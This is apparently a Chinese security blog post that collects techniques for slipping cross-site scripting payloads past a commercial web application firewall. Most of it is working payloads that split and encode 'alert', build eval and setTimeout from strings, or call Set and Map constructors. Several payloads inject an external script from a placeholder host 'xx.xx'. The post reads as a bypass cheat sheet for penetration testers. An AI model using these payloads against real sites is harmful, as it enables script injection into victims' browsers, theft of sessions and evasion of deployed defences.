对于我这个菜鸟来说,我通过谷歌百度学习到很多前辈的资料,甚至每句话都是他的指导,我也很感激前辈的为我们铺设的道路,让我们更快的成长起来。我也乐于分享,可能有些知识点过于单调或者久远,请见谅。
前几天花了10买了一个月的服务器,换个WAF来测试。
遗漏标签就不测试了,上一篇水文[https://www.anquanke.com/post/id/176185]的分享的标签也可以过,不信找几个试试= =
好吧非常打脸,拦截了。
然而换个prompt()函数???免费版当然是这样的啦,高级服务不仅我买不起,还绕不过啊,而且我不是真正的站长,规则我也不会设啊,总之就是这也不会那也不会。
Top属性类似的补充
还记得上篇的top属性嘛
实际上可以利用的还有好几个,看到这里各位是否get到什么了。
我们可以利用的类似拼接的对象又多了几个,例如:
//一家人就是要整整齐齐 <details open οntοggle=top['al'%2B'ert'](1) > <details open οntοggle=self['al'%2B'ert'](1) > <details open οntοggle=parent['al'%2B'ert'](1) > <details open οntοggle=frames['al'%2B'ert'](1) > <details open οntοggle=content['al'%2B'ert'](1) > <details open οntοggle=window['al'%2B'ert'](1) >
这些都可以绕过waf,总结起来有 top self parent frames content window,无疑top是最短的,所谓短小精悍,这里借用PKAV的一张ppt。
除了拆分构造,我们必须要了解还有编码,这个确实是老生常谈的话题,先看个例子吧
将e字母url编码,成功弹窗也绕过waf。 <details open ontoggle=top['al%65rt'](1) >
其他编码
JS8编码: <details open οntοggle=top['al\145rt'](1) > <details open οntοggle=top['\141\154\145\162\164'](1) > JS16编码: <details open οntοggle=top['al\x65rt'](1) > 其他 <details open οntοggle=top[/al/.source%2B/ert/.source](1) >
parseInt()
例子: alert字符串用parseInt函数,以基数为30转化后为8680439
toString()
例子: toString函数将返回的数字8680439,以基数为30还原
这样你就能理解下面这个例子了。
<details open οntοggle=top[8680439..toString(30)](1); > <details open οntοggle=top[11189117..toString(32)](1); >
例1
<img src=1 alt=al lang=ert οnerrοr=top[alt%2blang](0)>
这个例子很巧妙,将alt和lang属性分别赋值合并起来就是alert,并在top属性内将2个属性相加。
例2
<details open οntοggle=top[a='al',b='ev',b%2ba]('alert(1)')>
在top属性内添加2个变量,并赋值构造eval,然后执行alert(1)
测试下,拦截了。
其实waf拦截的是alert这个关键字,换个prompt()函数就过了
也可以选择将alert(1)编码,因为有eval存在啊,直接拿来用
<details open οntοggle=top[a='al',b='ev',b%2ba](atob('YWxlcnQoMSk='))>
<details open οntοggle=top[a='al',b='ev',b%2ba]('\141\154\145\162\164\50\61\51')>
<details open οntοggle=top[a='al',b='ev',b%2ba]('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
setTimeout()函数也是没问题的,毕竟也能执行代码。
<details open οntοggle=top[a='meout',b='setTi',b%2ba]('\141\154\145\162\164\50\61\51')>
setTimeout
WAF拦截
<svg/οnlοad=setTimeout`alert(1)`>
编码下,就绕过了。
<svg/οnlοad=setTimeout`alert\u0028233\u0029`>
setInterval
与setInterval不同,对于setTimeout()只执行code一次。
<svg/onload=setInterval('al'%2b'ert(1)')>
绕过waf,引用外部js。
<svg/οnlοad=setInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>
其他
拆分与编码
<svg/οnlοad=\u0073etInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>
<svg/οnlοad=\u0073etInterval(appendChild(createElement('sc\162ipt')).src='http://xx.xx/eeW')>
<svg/οnlοad=\u0073etInterval(appendChild(createElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
<svg/οnlοad=\u0073etInterval(\u0061ppendChild(\u0063reateElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
结合函数:
<iframe οnlοad=s=createElement('script');body.appendChild(s);s.src=['http','://','xx.xx','/eeW'].join('') >
<svg/οnlοad=s=createElement('script');body.appendChild(s);s.src=['http']%2B['://']%2B['xx.xx']%2B['/eeW'].join('') >
<svg/οnlοad=s=\u0063reateElement('scr'%2b'ipt');\u0062ody.\u0061ppendChild(s);s.src='http://x'.concat('x.xx/','eeW'); >
关于运用基于DOM的方法创建和插入节点把外部JS文件注入到网页,这种方法在<<XSS跨站脚本剖析与防御>>有介绍过。我这里简单演示下,如果你了解或者不感兴趣可以跳过这段。
首先用createElement方法创建一个script标签。
接下来给<script>的src属性设置成外部url
可以看到<script>标签以及src属性已经被创建出来,但是并不在页面上输出啊。
我们就要用到appendChild()方法将变量s插入页面。
再来看看页面上
少年!Post到什么了没有。
又是拆分。。注意后面的()
<svg/οnlοad=Set.constructor('al'%2b'ert(1)')()>
反引号我看行。。注意后面2个反引号。
<svg/οnlοad=Set.constructor`al\x65rt\x28/xss/\x29```>
又来引用外部url。编码拆分以及结合函数,请参考上章= =,不然我怕有人说我水。。。
<svg/οnlοad=Set.constructor(appendChild(createElement('script')).src='http://xx.xx/eeW')()>
咳咳,该补充的还是要补充的,除了 Set 对象还有嘛?当然有的。
看些例子,都可以弹窗。
来个简单拆分。
总结起来就是Set.constructor Map.constructor clear.constructor Array.constructor WeakSet.constructor WeakMap.constructor(注意区分大小写的)
<svg/onload=Set.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=Map.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=clear.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=Array.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=WeakSet.constructor`al\x65rt\x28/xss/\x29```>
引用外部...
感兴趣的同学可以关注:https://github.com/S9MF/Xss_Test/blob/master/waf/YunSuo.md
http://www.vulnerability-lab.com/resources/documents/531.txt
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
推荐阅读:
https://github.com/S9MF/Xss_Test/